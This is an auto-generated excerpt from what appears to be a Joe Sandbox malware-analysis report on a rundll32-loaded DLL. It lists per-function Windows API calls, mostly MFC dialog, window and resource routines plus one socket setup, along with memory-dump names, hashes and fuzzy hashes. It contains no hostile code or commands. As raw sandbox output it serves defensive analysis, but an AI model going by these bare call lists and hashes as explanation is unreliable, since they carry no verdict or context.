                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction ID: 5c8f7e15fc6d9e06ebf4fa262ac9747ef485c43692dc612ad86c8b01a400670e
                                                                                                                      • Opcode Fuzzy Hash: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction Fuzzy Hash: B6317374A85218DBE724DB90CD56FD9B3B1EF49300F1041E8E509AA2C1DB72E9D18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
